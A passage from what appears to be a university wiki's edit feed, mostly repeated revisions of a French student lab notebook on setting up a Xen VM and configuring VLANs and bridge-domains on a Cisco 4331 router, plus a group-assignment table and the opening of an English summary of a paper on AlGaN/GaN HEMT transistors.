Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34570</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34570"/>
				<updated>2016-10-15T09:10:07Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Travail réalisé la 2 et 3e semaine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (14/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (21/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34534</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34534"/>
				<updated>2016-10-14T14:13:59Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (14/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (21/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2 et 3e semaine ====&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=TP_sysres_IMA5sc_2016/2017&amp;diff=33851</id>
		<title>TP sysres IMA5sc 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=TP_sysres_IMA5sc_2016/2017&amp;diff=33851"/>
				<updated>2016-10-03T14:57:20Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Cahier&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Tâche particulière&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°1]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Bonding Linux&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°2]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cablâge &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°3]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; DAS + Serveur Sauvegarde &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°4]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; LACP&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°5]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  ROJ Thomas - MAIA Stéphane &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 4331 Routage &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°6]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; SZWECHOWIEZ Maxime &amp;amp; LENTIEUL Romuald &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 3560E Routage&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°7]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 6006 Commutateur &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°8]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 6006 Commutateur &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°9]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration Wifi &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°10]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration Wifi &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33634</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33634"/>
				<updated>2016-09-18T08:02:26Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;erci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32126</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32126"/>
				<updated>2016-06-14T15:08:56Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. HEMT are heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allows to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V ('''Capacitance = f(Gate voltage)''') profile, on the Nd-Na profile ('''Nd-Na : representative of doping level'''), in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
